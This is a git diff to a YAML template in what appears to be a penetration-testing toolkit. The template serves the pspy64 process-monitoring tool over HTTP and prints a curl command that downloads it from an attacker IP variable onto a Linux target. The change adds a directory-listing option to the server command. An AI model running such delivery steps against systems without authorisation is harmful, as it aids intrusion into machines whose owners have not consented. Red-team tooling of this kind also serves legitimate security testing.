--- a/src/profi/templates/scripts/deliver-linux-pspy.yaml
+++ b/src/profi/templates/scripts/deliver-linux-pspy.yaml
@@ -11,4 +11,4 @@ content: |
   echo '                       -----Linux------                         '; \
   echo 'Deliver: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/pspy64 -o <%=$(esh variables/delivery_path_linux)%>/pspy64'; \
   echo '================================================================'; \
-   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound <%=$(esh variables/delivery_dir_listing)%>
